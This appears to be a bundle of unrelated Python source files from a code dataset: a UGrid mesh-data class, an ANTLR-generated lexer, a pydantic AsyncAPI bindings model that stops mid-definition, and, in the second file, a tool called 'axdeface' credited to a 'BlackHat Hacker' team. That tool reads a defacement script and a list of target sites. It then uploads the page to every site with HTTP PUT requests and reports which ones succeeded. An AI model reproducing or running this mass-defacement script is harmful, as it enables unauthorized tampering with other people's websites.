        def _fresh(value):
            return array([]) if value is None else value

        self.name: str = name
        self.edge_node: ndarray = edge_node
        self.node_x: ndarray = node_x
        self.node_y: ndarray = node_y
        self.face_node: ndarray = _fresh(face_node)
        self.edge_x: ndarray = _fresh(edge_x)
        self.edge_y: ndarray = _fresh(edge_y)
        self.face_x: ndarray = _fresh(face_x)
        self.face_y: ndarray = _fresh(face_y)
        self.edge_face: ndarray = _fresh(edge_face)
        self.face_edge: ndarray = _fresh(face_edge)
        self.face_face: ndarray = _fresh(face_face)
        self.node_z: ndarray = _fresh(node_z)
        self.edge_z: ndarray = _fresh(edge_z)
        self.face_z: ndarray = _fresh(face_z)
        self.layer_zs: ndarray = _fresh(layer_zs)
        self.interface_zs: ndarray = _fresh(interface_zs)
        self.boundary_node_connectivity: ndarray = _fresh(boundary_node_connectivity)
        self.volume_coordinates: ndarray = _fresh(volume_coordinates)
        self.start_index: int = start_index
        self.num_face_nodes_max: int = num_face_nodes_max
        self.is_spherical: int = is_spherical
        self.double_fill_value: float = double_fill_value
        self.int_fill_value: int = int_fill_value
class UGridContacts:
    """Contacts data used to define/put/inquire/get UGrid contacts.

    Attributes:
        name (str): The name of the contact entity.
        edges (ndarray): The actual contacts, expressed as pairs of indices
            from one mesh to another.
        contact_type (ndarray): For each contact its type.
        contact_name_id (list): The name of each contact.
        contact_name_long (list): The long name of each contact.
        mesh_from_name (str): The name of the mesh where the contacts start.
        mesh_to_name (str): The name of the mesh where the contacts end.
        mesh_from_location (int): The location type (node, edge or face) at the contact start.
        mesh_to_location (int): The location type (node, edge or face) at the contact end.
    """

    def __init__(
        self,
        name,
        edges,
        mesh_from_name,
        mesh_to_name,
        contact_type=None,
        contact_name_id=None,
        contact_name_long=None,
        mesh_from_location=0,
        mesh_to_location=0,
    ):
        # Bug fix: the name-list defaults were the built-in `list` *type*
        # (``contact_name_id=list``), so the attributes held the type object
        # instead of an empty list; the array default was also shared between
        # instances. None sentinels give each instance fresh containers.
        self.name: str = name
        self.edges: ndarray = edges
        self.mesh_from_name: str = mesh_from_name
        self.mesh_to_name: str = mesh_to_name
        self.contact_type: ndarray = array([]) if contact_type is None else contact_type
        self.contact_name_id: list = [] if contact_name_id is None else contact_name_id
        self.contact_name_long: list = [] if contact_name_long is None else contact_name_long
        self.mesh_from_location: int = mesh_from_location
        self.mesh_to_location: int = mesh_to_location
|
StarcoderdataPython
|
4816151
|
#-*- coding: utf-8 -*-
try:
import requests
import os.path
import time
import sys
except ImportError:
exit("install requests and try again ...")
import os
os.system ("clear")
banner = """
\033[31m █████╗ ██╗ ██╗██████╗ \033[0m Author :\033[93m <NAME> Z\033[0m
\033[31m ██╔══██╗╚██╗██╔╝██╔══██╗\033[0m Date :\033[93m 2020-09-16\033[0m
\033[31m ███████║ ╚███╔╝ ██║ ██║\033[0m Tools :\033[93m axdeface V.1.0\033[0m
\033[77m ██╔══██║ ██╔██╗ ██║ ██║\033[0m Github :\033[93m /djunekz\033[0m
\033[77m ██║ ██║██╔╝ ██╗██████╔╝\033[0m irssi :\033[93m CyberPEJAYA\033[0m
\033[77m ╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ \033[0m Team :\033[93m Surabaya BlackHat Hacker\033[0m
"""
b = '\033[31m'
h = '\033[32m'
m = '\033[00m'
def x(tetew):
ipt = ''
if sys.version_info.major > 2:
ipt = input(tetew)
else:
ipt = raw_input(tetew)
return str(ipt)
def axd(script,target_file="target.txt"):
op = open(script,"r").read()
with open(target_file, "r") as target:
target = target.readlines()
s = requests.Session()
print ("\33[31m[\33[0;32m√\33[0m\33[31m]\33[0m Save File. . .")
print ("\33[31m[\33[0;32m√\33[0m\33[31m]\33[0m Update. . .")
print ("\33[31m[\33[0;32m√\33[0m\33[31m]\33[0m File script \33[0;32mAccepted\33[0m")
print ("\33[31m[\33[77m>\33[0m\33[31m]\33[0m Target [\033[32m%d\033[0m] website"%(len(target)))
print ("\33[31m[\33[33m!\33[0m\33[31m]\33[0m Proses upload file script deface.. . .")
load = '█'
count = 0
for x in range(101):
time.sleep(0.8)
print (f'\r\33[31m[\33[33m!\33[0m\33[31m]\33[0m Uploading file script \33[32m[{load}]\33[0m : \33[32m{x}\33[0m%', end='', flush=True)
count += 1
if count == 3:
count = 0
load += '█'
print ('\n\n\33[31m[\33[0;32m√\33[0m\33[31m]\33[0m Upload Done. . .')
print ('\n\33[31m[\33[33m!\33[0m\33[31m]\33[0m Proses peretasan. . .')
for web in target:
try:
site = web.strip()
if site.startswith("http://") is False:
site = "http://" + site
req = s.put(site+"/"+script,data=op)
if req.status_code < 200 or req.status_code >= 250:
print(m+"["+b+" FAILED!"+m+" ] \33[33;1m%s/%s"%(site,script))
else:
print(m+"["+h+" SUCCESS"+m+" ] \33[32;1m%s/%s"%(site,script))
except requests.exceptions.RequestException:
continue
except KeyboardInterrupt:
print; exit()
def main(__bn__):
print(__bn__)
while True:
try:
a = x("\33[31m[\33[77m>\33[0m\33[31m]\33[0m Ketik nama file script deface : ")
if not os.path.isfile(a):
print ("\33[31m[\33[33m!\33[0m\33[31m]\33[0m file\033[31m %s \033[0mtidak ada didalam folder ini. . ."%(a))
continue
else:
break
except KeyboardInterrupt:
print; exit()
axd(a)
if __name__ == "__main__":
main(banner)
|
StarcoderdataPython
|
140606
|
<gh_stars>0
# Generated from APi.g4 by ANTLR 4.9
from antlr4 import *
from io import StringIO
from typing.io import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2\63")
buf.write("\u018f\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7")
buf.write("\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r")
buf.write("\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23")
buf.write("\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30")
buf.write("\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36")
buf.write("\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%")
buf.write("\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.")
buf.write("\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64")
buf.write("\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:")
buf.write("\4;\t;\4<\t<\3\2\3\2\3\3\3\3\3\4\3\4\3\5\3\5\3\6\3\6\3")
buf.write("\7\3\7\3\b\3\b\3\t\3\t\3\n\3\n\3\13\3\13\3\13\3\13\3\13")
buf.write("\3\f\3\f\3\f\3\f\3\f\3\f\3\r\3\r\3\r\3\r\3\r\3\16\3\16")
buf.write("\3\17\3\17\3\20\3\20\3\21\3\21\3\21\3\22\3\22\3\23\3\23")
buf.write("\3\23\3\23\3\23\3\23\3\24\3\24\3\24\3\24\3\24\3\24\3\24")
buf.write("\3\25\3\25\3\25\3\25\3\25\3\25\3\25\3\26\3\26\3\26\3\26")
buf.write("\3\26\3\27\3\27\3\27\3\27\3\27\3\27\3\27\3\30\3\30\3\30")
buf.write("\3\30\3\30\3\30\3\30\3\30\3\30\3\30\3\30\3\30\3\31\3\31")
buf.write("\3\32\3\32\3\33\3\33\3\34\3\34\3\35\3\35\3\35\3\35\3\35")
buf.write("\3\35\3\36\3\36\3\36\3\36\3\36\3\37\3\37\3\37\3\37\3\37")
buf.write("\3\37\3 \3 \3 \3 \3 \3 \3 \3 \3!\3!\3!\3!\3!\3!\3\"\3")
buf.write("\"\3\"\3\"\3\"\3#\3#\3#\3#\3$\3$\3$\3%\3%\3%\3&\3&\3&")
buf.write("\3\'\3\'\3(\3(\5(\u0110\n(\3)\3)\3)\3)\7)\u0116\n)\f)")
buf.write("\16)\u0119\13)\3*\3*\3*\3*\7*\u011f\n*\f*\16*\u0122\13")
buf.write("*\3*\3*\3*\3+\3+\3,\3,\3-\3-\3.\3.\3.\3/\3/\7/\u0132\n")
buf.write("/\f/\16/\u0135\13/\3\60\3\60\3\60\3\60\5\60\u013b\n\60")
buf.write("\3\61\5\61\u013e\n\61\3\62\3\62\3\62\7\62\u0143\n\62\f")
buf.write("\62\16\62\u0146\13\62\3\62\3\62\3\62\3\62\7\62\u014c\n")
buf.write("\62\f\62\16\62\u014f\13\62\3\62\5\62\u0152\n\62\3\63\3")
buf.write("\63\3\63\5\63\u0157\n\63\3\64\3\64\3\64\5\64\u015c\n\64")
buf.write("\3\65\3\65\3\65\3\65\3\65\3\65\3\66\3\66\3\67\3\67\38")
buf.write("\38\39\59\u016b\n9\39\39\39\69\u0170\n9\r9\169\u0171\5")
buf.write("9\u0174\n9\39\59\u0177\n9\3:\3:\3:\7:\u017c\n:\f:\16:")
buf.write("\u017f\13:\5:\u0181\n:\3;\3;\5;\u0185\n;\3;\3;\3<\6<\u018a")
buf.write("\n<\r<\16<\u018b\3<\3<\3\u0120\2=\3\3\5\4\7\5\t\6\13\7")
buf.write("\r\b\17\t\21\n\23\13\25\f\27\r\31\16\33\17\35\20\37\21")
buf.write("!\22#\23%\24\'\25)\26+\27-\30/\31\61\32\63\33\65\34\67")
buf.write("\359\36;\37= ?!A\"C#E$G%I&K\'M(O)Q*S+U,W-Y.[/]\60_\2a")
buf.write("\2c\61e\2g\2i\2k\2m\2o\2q\62s\2u\2w\63\3\2\22\3\2\f\f")
buf.write("\3\2\13\13\b\2\"\"/<>>@@C\\c|\4\2//aa\5\2\u00b9\u00b9")
buf.write("\u0302\u0371\u2041\u2042\t\2C\\c|\u2072\u2191\u2c02\u2ff1")
buf.write("\u3003\ud801\uf902\ufdd1\ufdf2\uffff\n\2$$\61\61^^ddh")
buf.write("hppttvv\n\2))\61\61^^ddhhppttvv\5\2\62;CHch\5\2\2!$$^")
buf.write("^\5\2\2!))^^\3\2\62;\3\2\63;\4\2GGgg\4\2--//\4\2\17\17")
buf.write("\"\"\2\u019a\2\3\3\2\2\2\2\5\3\2\2\2\2\7\3\2\2\2\2\t\3")
buf.write("\2\2\2\2\13\3\2\2\2\2\r\3\2\2\2\2\17\3\2\2\2\2\21\3\2")
buf.write("\2\2\2\23\3\2\2\2\2\25\3\2\2\2\2\27\3\2\2\2\2\31\3\2\2")
buf.write("\2\2\33\3\2\2\2\2\35\3\2\2\2\2\37\3\2\2\2\2!\3\2\2\2\2")
buf.write("#\3\2\2\2\2%\3\2\2\2\2\'\3\2\2\2\2)\3\2\2\2\2+\3\2\2\2")
buf.write("\2-\3\2\2\2\2/\3\2\2\2\2\61\3\2\2\2\2\63\3\2\2\2\2\65")
buf.write("\3\2\2\2\2\67\3\2\2\2\29\3\2\2\2\2;\3\2\2\2\2=\3\2\2\2")
buf.write("\2?\3\2\2\2\2A\3\2\2\2\2C\3\2\2\2\2E\3\2\2\2\2G\3\2\2")
buf.write("\2\2I\3\2\2\2\2K\3\2\2\2\2M\3\2\2\2\2O\3\2\2\2\2Q\3\2")
buf.write("\2\2\2S\3\2\2\2\2U\3\2\2\2\2W\3\2\2\2\2Y\3\2\2\2\2[\3")
buf.write("\2\2\2\2]\3\2\2\2\2c\3\2\2\2\2q\3\2\2\2\2w\3\2\2\2\3y")
buf.write("\3\2\2\2\5{\3\2\2\2\7}\3\2\2\2\t\177\3\2\2\2\13\u0081")
buf.write("\3\2\2\2\r\u0083\3\2\2\2\17\u0085\3\2\2\2\21\u0087\3\2")
buf.write("\2\2\23\u0089\3\2\2\2\25\u008b\3\2\2\2\27\u0090\3\2\2")
buf.write("\2\31\u0096\3\2\2\2\33\u009b\3\2\2\2\35\u009d\3\2\2\2")
buf.write("\37\u009f\3\2\2\2!\u00a1\3\2\2\2#\u00a4\3\2\2\2%\u00a6")
buf.write("\3\2\2\2\'\u00ac\3\2\2\2)\u00b3\3\2\2\2+\u00ba\3\2\2\2")
buf.write("-\u00bf\3\2\2\2/\u00c6\3\2\2\2\61\u00d2\3\2\2\2\63\u00d4")
buf.write("\3\2\2\2\65\u00d6\3\2\2\2\67\u00d8\3\2\2\29\u00da\3\2")
buf.write("\2\2;\u00e0\3\2\2\2=\u00e5\3\2\2\2?\u00eb\3\2\2\2A\u00f3")
buf.write("\3\2\2\2C\u00f9\3\2\2\2E\u00fe\3\2\2\2G\u0102\3\2\2\2")
buf.write("I\u0105\3\2\2\2K\u0108\3\2\2\2M\u010b\3\2\2\2O\u010f\3")
buf.write("\2\2\2Q\u0111\3\2\2\2S\u011a\3\2\2\2U\u0126\3\2\2\2W\u0128")
buf.write("\3\2\2\2Y\u012a\3\2\2\2[\u012c\3\2\2\2]\u012f\3\2\2\2")
buf.write("_\u013a\3\2\2\2a\u013d\3\2\2\2c\u0151\3\2\2\2e\u0153\3")
buf.write("\2\2\2g\u0158\3\2\2\2i\u015d\3\2\2\2k\u0163\3\2\2\2m\u0165")
buf.write("\3\2\2\2o\u0167\3\2\2\2q\u016a\3\2\2\2s\u0180\3\2\2\2")
buf.write("u\u0182\3\2\2\2w\u0189\3\2\2\2yz\7<\2\2z\4\3\2\2\2{|\7")
buf.write("*\2\2|\6\3\2\2\2}~\7+\2\2~\b\3\2\2\2\177\u0080\7\60\2")
buf.write("\2\u0080\n\3\2\2\2\u0081\u0082\7}\2\2\u0082\f\3\2\2\2")
buf.write("\u0083\u0084\7.\2\2\u0084\16\3\2\2\2\u0085\u0086\7\177")
buf.write("\2\2\u0086\20\3\2\2\2\u0087\u0088\7]\2\2\u0088\22\3\2")
buf.write("\2\2\u0089\u008a\7_\2\2\u008a\24\3\2\2\2\u008b\u008c\7")
buf.write("v\2\2\u008c\u008d\7t\2\2\u008d\u008e\7w\2\2\u008e\u008f")
buf.write("\7g\2\2\u008f\26\3\2\2\2\u0090\u0091\7h\2\2\u0091\u0092")
buf.write("\7c\2\2\u0092\u0093\7n\2\2\u0093\u0094\7u\2\2\u0094\u0095")
buf.write("\7g\2\2\u0095\30\3\2\2\2\u0096\u0097\7p\2\2\u0097\u0098")
buf.write("\7w\2\2\u0098\u0099\7n\2\2\u0099\u009a\7n\2\2\u009a\32")
buf.write("\3\2\2\2\u009b\u009c\7>\2\2\u009c\34\3\2\2\2\u009d\u009e")
buf.write("\7@\2\2\u009e\36\3\2\2\2\u009f\u00a0\7\61\2\2\u00a0 \3")
buf.write("\2\2\2\u00a1\u00a2\7\61\2\2\u00a2\u00a3\7@\2\2\u00a3\"")
buf.write("\3\2\2\2\u00a4\u00a5\7?\2\2\u00a5$\3\2\2\2\u00a6\u00a7")
buf.write("\7u\2\2\u00a7\u00a8\7v\2\2\u00a8\u00a9\7f\2\2\u00a9\u00aa")
buf.write("\7k\2\2\u00aa\u00ab\7p\2\2\u00ab&\3\2\2\2\u00ac\u00ad")
buf.write("\7u\2\2\u00ad\u00ae\7v\2\2\u00ae\u00af\7f\2\2\u00af\u00b0")
buf.write("\7q\2\2\u00b0\u00b1\7w\2\2\u00b1\u00b2\7v\2\2\u00b2(\3")
buf.write("\2\2\2\u00b3\u00b4\7u\2\2\u00b4\u00b5\7v\2\2\u00b5\u00b6")
buf.write("\7f\2\2\u00b6\u00b7\7g\2\2\u00b7\u00b8\7t\2\2\u00b8\u00b9")
buf.write("\7t\2\2\u00b9*\3\2\2\2\u00ba\u00bb\7x\2\2\u00bb\u00bc")
buf.write("\7q\2\2\u00bc\u00bd\7k\2\2\u00bd\u00be\7f\2\2\u00be,\3")
buf.write("\2\2\2\u00bf\u00c0\7k\2\2\u00c0\u00c1\7o\2\2\u00c1\u00c2")
buf.write("\7r\2\2\u00c2\u00c3\7q\2\2\u00c3\u00c4\7t\2\2\u00c4\u00c5")
buf.write("\7v\2\2\u00c5.\3\2\2\2\u00c6\u00c7\7g\2\2\u00c7\u00c8")
buf.write("\7p\2\2\u00c8\u00c9\7x\2\2\u00c9\u00ca\7k\2\2\u00ca\u00cb")
buf.write("\7t\2\2\u00cb\u00cc\7q\2\2\u00cc\u00cd\7p\2\2\u00cd\u00ce")
buf.write("\7o\2\2\u00ce\u00cf\7g\2\2\u00cf\u00d0\7p\2\2\u00d0\u00d1")
buf.write("\7v\2\2\u00d1\60\3\2\2\2\u00d2\u00d3\7(\2\2\u00d3\62\3")
buf.write("\2\2\2\u00d4\u00d5\7#\2\2\u00d5\64\3\2\2\2\u00d6\u00d7")
buf.write("\7-\2\2\u00d7\66\3\2\2\2\u00d8\u00d9\7~\2\2\u00d98\3\2")
buf.write("\2\2\u00da\u00db\7u\2\2\u00db\u00dc\7v\2\2\u00dc\u00dd")
buf.write("\7c\2\2\u00dd\u00de\7t\2\2\u00de\u00df\7v\2\2\u00df:\3")
buf.write("\2\2\2\u00e0\u00e1\7u\2\2\u00e1\u00e2\7g\2\2\u00e2\u00e3")
buf.write("\7n\2\2\u00e3\u00e4\7h\2\2\u00e4<\3\2\2\2\u00e5\u00e6")
buf.write("\7c\2\2\u00e6\u00e7\7i\2\2\u00e7\u00e8\7g\2\2\u00e8\u00e9")
buf.write("\7p\2\2\u00e9\u00ea\7v\2\2\u00ea>\3\2\2\2\u00eb\u00ec")
buf.write("\7e\2\2\u00ec\u00ed\7j\2\2\u00ed\u00ee\7c\2\2\u00ee\u00ef")
buf.write("\7p\2\2\u00ef\u00f0\7p\2\2\u00f0\u00f1\7g\2\2\u00f1\u00f2")
buf.write("\7n\2\2\u00f2@\3\2\2\2\u00f3\u00f4\7t\2\2\u00f4\u00f5")
buf.write("\7g\2\2\u00f5\u00f6\7i\2\2\u00f6\u00f7\7g\2\2\u00f7\u00f8")
buf.write("\7z\2\2\u00f8B\3\2\2\2\u00f9\u00fa\7l\2\2\u00fa\u00fb")
buf.write("\7u\2\2\u00fb\u00fc\7q\2\2\u00fc\u00fd\7p\2\2\u00fdD\3")
buf.write("\2\2\2\u00fe\u00ff\7z\2\2\u00ff\u0100\7o\2\2\u0100\u0101")
buf.write("\7n\2\2\u0101F\3\2\2\2\u0102\u0103\7?\2\2\u0103\u0104")
buf.write("\7@\2\2\u0104H\3\2\2\2\u0105\u0106\7>\2\2\u0106\u0107")
buf.write("\7?\2\2\u0107J\3\2\2\2\u0108\u0109\7/\2\2\u0109\u010a")
buf.write("\7@\2\2\u010aL\3\2\2\2\u010b\u010c\7\62\2\2\u010cN\3\2")
buf.write("\2\2\u010d\u0110\5Q)\2\u010e\u0110\5S*\2\u010f\u010d\3")
buf.write("\2\2\2\u010f\u010e\3\2\2\2\u0110P\3\2\2\2\u0111\u0112")
buf.write("\7\61\2\2\u0112\u0113\7\61\2\2\u0113\u0117\3\2\2\2\u0114")
buf.write("\u0116\n\2\2\2\u0115\u0114\3\2\2\2\u0116\u0119\3\2\2\2")
buf.write("\u0117\u0115\3\2\2\2\u0117\u0118\3\2\2\2\u0118R\3\2\2")
buf.write("\2\u0119\u0117\3\2\2\2\u011a\u011b\7\61\2\2\u011b\u011c")
buf.write("\7,\2\2\u011c\u0120\3\2\2\2\u011d\u011f\13\2\2\2\u011e")
buf.write("\u011d\3\2\2\2\u011f\u0122\3\2\2\2\u0120\u0121\3\2\2\2")
buf.write("\u0120\u011e\3\2\2\2\u0121\u0123\3\2\2\2\u0122\u0120\3")
buf.write("\2\2\2\u0123\u0124\7,\2\2\u0124\u0125\7\61\2\2\u0125T")
buf.write("\3\2\2\2\u0126\u0127\t\2\2\2\u0127V\3\2\2\2\u0128\u0129")
buf.write("\t\3\2\2\u0129X\3\2\2\2\u012a\u012b\n\4\2\2\u012bZ\3\2")
buf.write("\2\2\u012c\u012d\7A\2\2\u012d\u012e\5]/\2\u012e\\\3\2")
buf.write("\2\2\u012f\u0133\5a\61\2\u0130\u0132\5_\60\2\u0131\u0130")
buf.write("\3\2\2\2\u0132\u0135\3\2\2\2\u0133\u0131\3\2\2\2\u0133")
buf.write("\u0134\3\2\2\2\u0134^\3\2\2\2\u0135\u0133\3\2\2\2\u0136")
buf.write("\u013b\5a\61\2\u0137\u013b\t\5\2\2\u0138\u013b\5s:\2\u0139")
buf.write("\u013b\t\6\2\2\u013a\u0136\3\2\2\2\u013a\u0137\3\2\2\2")
buf.write("\u013a\u0138\3\2\2\2\u013a\u0139\3\2\2\2\u013b`\3\2\2")
buf.write("\2\u013c\u013e\t\7\2\2\u013d\u013c\3\2\2\2\u013eb\3\2")
buf.write("\2\2\u013f\u0144\7$\2\2\u0140\u0143\5e\63\2\u0141\u0143")
buf.write("\5m\67\2\u0142\u0140\3\2\2\2\u0142\u0141\3\2\2\2\u0143")
buf.write("\u0146\3\2\2\2\u0144\u0142\3\2\2\2\u0144\u0145\3\2\2\2")
buf.write("\u0145\u0147\3\2\2\2\u0146\u0144\3\2\2\2\u0147\u0152\7")
buf.write("$\2\2\u0148\u014d\7)\2\2\u0149\u014c\5g\64\2\u014a\u014c")
buf.write("\5o8\2\u014b\u0149\3\2\2\2\u014b\u014a\3\2\2\2\u014c\u014f")
buf.write("\3\2\2\2\u014d\u014b\3\2\2\2\u014d\u014e\3\2\2\2\u014e")
buf.write("\u0150\3\2\2\2\u014f\u014d\3\2\2\2\u0150\u0152\7)\2\2")
buf.write("\u0151\u013f\3\2\2\2\u0151\u0148\3\2\2\2\u0152d\3\2\2")
buf.write("\2\u0153\u0156\7^\2\2\u0154\u0157\t\b\2\2\u0155\u0157")
buf.write("\5i\65\2\u0156\u0154\3\2\2\2\u0156\u0155\3\2\2\2\u0157")
buf.write("f\3\2\2\2\u0158\u015b\7^\2\2\u0159\u015c\t\t\2\2\u015a")
buf.write("\u015c\5i\65\2\u015b\u0159\3\2\2\2\u015b\u015a\3\2\2\2")
buf.write("\u015ch\3\2\2\2\u015d\u015e\7w\2\2\u015e\u015f\5k\66\2")
buf.write("\u015f\u0160\5k\66\2\u0160\u0161\5k\66\2\u0161\u0162\5")
buf.write("k\66\2\u0162j\3\2\2\2\u0163\u0164\t\n\2\2\u0164l\3\2\2")
buf.write("\2\u0165\u0166\n\13\2\2\u0166n\3\2\2\2\u0167\u0168\n\f")
buf.write("\2\2\u0168p\3\2\2\2\u0169\u016b\7/\2\2\u016a\u0169\3\2")
buf.write("\2\2\u016a\u016b\3\2\2\2\u016b\u016c\3\2\2\2\u016c\u0173")
buf.write("\5s:\2\u016d\u016f\7\60\2\2\u016e\u0170\t\r\2\2\u016f")
buf.write("\u016e\3\2\2\2\u0170\u0171\3\2\2\2\u0171\u016f\3\2\2\2")
buf.write("\u0171\u0172\3\2\2\2\u0172\u0174\3\2\2\2\u0173\u016d\3")
buf.write("\2\2\2\u0173\u0174\3\2\2\2\u0174\u0176\3\2\2\2\u0175\u0177")
buf.write("\5u;\2\u0176\u0175\3\2\2\2\u0176\u0177\3\2\2\2\u0177r")
buf.write("\3\2\2\2\u0178\u0181\7\62\2\2\u0179\u017d\t\16\2\2\u017a")
buf.write("\u017c\t\r\2\2\u017b\u017a\3\2\2\2\u017c\u017f\3\2\2\2")
buf.write("\u017d\u017b\3\2\2\2\u017d\u017e\3\2\2\2\u017e\u0181\3")
buf.write("\2\2\2\u017f\u017d\3\2\2\2\u0180\u0178\3\2\2\2\u0180\u0179")
buf.write("\3\2\2\2\u0181t\3\2\2\2\u0182\u0184\t\17\2\2\u0183\u0185")
buf.write("\t\20\2\2\u0184\u0183\3\2\2\2\u0184\u0185\3\2\2\2\u0185")
buf.write("\u0186\3\2\2\2\u0186\u0187\5s:\2\u0187v\3\2\2\2\u0188")
buf.write("\u018a\t\21\2\2\u0189\u0188\3\2\2\2\u018a\u018b\3\2\2")
buf.write("\2\u018b\u0189\3\2\2\2\u018b\u018c\3\2\2\2\u018c\u018d")
buf.write("\3\2\2\2\u018d\u018e\b<\2\2\u018ex\3\2\2\2\30\2\u010f")
buf.write("\u0117\u0120\u0133\u013a\u013d\u0142\u0144\u014b\u014d")
buf.write("\u0151\u0156\u015b\u016a\u0171\u0173\u0176\u017d\u0180")
buf.write("\u0184\u018b\3\b\2\2")
return buf.getvalue()
class APiLexer(Lexer):
    # NOTE(review): this class is auto-generated by ANTLR 4.9 from APi.g4
    # (see grammarFileName below) -- do not edit by hand; regenerate from
    # the grammar instead.

    atn = ATNDeserializer().deserialize(serializedATN())

    decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]

    # Token type constants, one per grammar token (index == token type).
    T__0 = 1
    T__1 = 2
    T__2 = 3
    T__3 = 4
    T__4 = 5
    T__5 = 6
    T__6 = 7
    T__7 = 8
    T__8 = 9
    T__9 = 10
    T__10 = 11
    T__11 = 12
    T__12 = 13
    T__13 = 14
    T__14 = 15
    T__15 = 16
    T__16 = 17
    STDIN = 18
    STDOUT = 19
    STDERR = 20
    VOID = 21
    IMPORT = 22
    ENVIRONMENT = 23
    ONSUCCESS = 24
    ONFAIL = 25
    RESTART = 26
    PARALLEL = 27
    START = 28
    SELF = 29
    AGENT = 30
    CHANNEL = 31
    REGEX = 32
    JSON = 33
    XML = 34
    INPUT_FORMAT = 35
    OUTPUT_FORMAT = 36
    SENDS = 37
    NIL = 38
    COMMENT = 39
    COMMENT1 = 40
    COMMENT2 = 41
    NEWLINE = 42
    TAB = 43
    SPEC_CHAR = 44
    VARIABLE = 45
    IDENT = 46
    STRING = 47
    NUMBER = 48
    SPACE = 49

    channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]

    modeNames = [ "DEFAULT_MODE" ]

    # Literal spellings of fixed tokens (list index == token type).
    literalNames = [ "<INVALID>",
            "':'", "'('", "')'", "'.'", "'{'", "','", "'}'", "'['", "']'",
            "'true'", "'false'", "'null'", "'<'", "'>'", "'/'", "'/>'",
            "'='", "'stdin'", "'stdout'", "'stderr'", "'void'", "'import'",
            "'environment'", "'&'", "'!'", "'+'", "'|'", "'start'", "'self'",
            "'agent'", "'channel'", "'regex'", "'json'", "'xml'", "'=>'",
            "'<='", "'->'", "'0'" ]

    # Symbolic names of named tokens (list index == token type).
    symbolicNames = [ "<INVALID>",
            "STDIN", "STDOUT", "STDERR", "VOID", "IMPORT", "ENVIRONMENT",
            "ONSUCCESS", "ONFAIL", "RESTART", "PARALLEL", "START", "SELF",
            "AGENT", "CHANNEL", "REGEX", "JSON", "XML", "INPUT_FORMAT",
            "OUTPUT_FORMAT", "SENDS", "NIL", "COMMENT", "COMMENT1", "COMMENT2",
            "NEWLINE", "TAB", "SPEC_CHAR", "VARIABLE", "IDENT", "STRING",
            "NUMBER", "SPACE" ]

    # Lexer rule names, including fragment rules (NameChar1, ESC1, ...).
    ruleNames = [ "T__0", "T__1", "T__2", "T__3", "T__4", "T__5", "T__6",
                  "T__7", "T__8", "T__9", "T__10", "T__11", "T__12", "T__13",
                  "T__14", "T__15", "T__16", "STDIN", "STDOUT", "STDERR",
                  "VOID", "IMPORT", "ENVIRONMENT", "ONSUCCESS", "ONFAIL",
                  "RESTART", "PARALLEL", "START", "SELF", "AGENT", "CHANNEL",
                  "REGEX", "JSON", "XML", "INPUT_FORMAT", "OUTPUT_FORMAT",
                  "SENDS", "NIL", "COMMENT", "COMMENT1", "COMMENT2", "NEWLINE",
                  "TAB", "SPEC_CHAR", "VARIABLE", "IDENT", "NameChar1",
                  "NameStartChar1", "STRING", "ESC1", "ESC2", "UNICODE",
                  "HEX", "SAFECODEPOINT1", "SAFECODEPOINT2", "NUMBER", "INT",
                  "EXP", "SPACE" ]

    grammarFileName = "APi.g4"

    def __init__(self, input=None, output:TextIO = sys.stdout):
        super().__init__(input, output)
        self.checkVersion("4.9")
        self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
        self._actions = None
        self._predicates = None
|
StarcoderdataPython
|
3271523
|
<gh_stars>0
from typing import Optional
from pydantic import BaseModel, Extra
from .http_bindings import HttpServerBinding
from .web_sockets_bindings import WebSocketsServerBinding
from .kafka_bindings import KafkaServerBinding
from .anypoint_mq_bindings import AnypointMqServerBinding
from .amqp_bindings import AmqpServerBinding
from .amqp1_bindings import Amqp1ServerBinding
from .mqtt_bindings import MqttServerBinding
from .mqtt5_bindings import Mqtt5ServerBinding
from .nats_bindings import NatsServerBinding
from .jms_bindings import JmsServerBinding
from .sns_bindings import SnsServerBinding
from .solace_bindings import SolaceServerBinding
from .sqs_bindings import SqsServerBinding
from .stomp_bindings import StompServerBinding
from .redis_bindings import RedisServerBinding
from .mercure_bindings import MercureServerBinding
from .ibm_mq_bindings import IbmMqServerBinding
class ServerBindings(BaseModel):
    """
    Map describing protocol-specific definitions for a server.
    """

    # One optional field per supported protocol; each value is that
    # protocol's server-binding object (AsyncAPI bindings).
    http: Optional[HttpServerBinding] = None
    """
    Protocol-specific information for an HTTP server.
    """

    ws: Optional[WebSocketsServerBinding] = None
    """
    Protocol-specific information for a WebSockets server.
    """

    kafka: Optional[KafkaServerBinding] = None
    """
    Protocol-specific information for a Kafka server.
    """

    anypointmq: Optional[AnypointMqServerBinding] = None
    """
    Protocol-specific information for an Anypoint MQ server.
    """

    amqp: Optional[AmqpServerBinding] = None
    """
    Protocol-specific information for an AMQP 0-9-1 server.
    """

    amqp1: Optional[Amqp1ServerBinding] = None
    """
    Protocol-specific information for an AMQP 1.0 server.
    """

    mqtt: Optional[MqttServerBinding] = None
    """
    Protocol-specific information for an MQTT server.
    """

    mqtt5: Optional[Mqtt5ServerBinding] = None
    """
    Protocol-specific information for an MQTT 5 server.
    """

    nats: Optional[NatsServerBinding] = None
    """
    Protocol-specific information for a NATS server.
    """

    jms: Optional[JmsServerBinding] = None
    """
    Protocol-specific information for a JMS server.
    """

    sns: Optional[SnsServerBinding] = None
    """
    Protocol-specific information for an SNS server.
    """

    solace: Optional[SolaceServerBinding] = None
    """
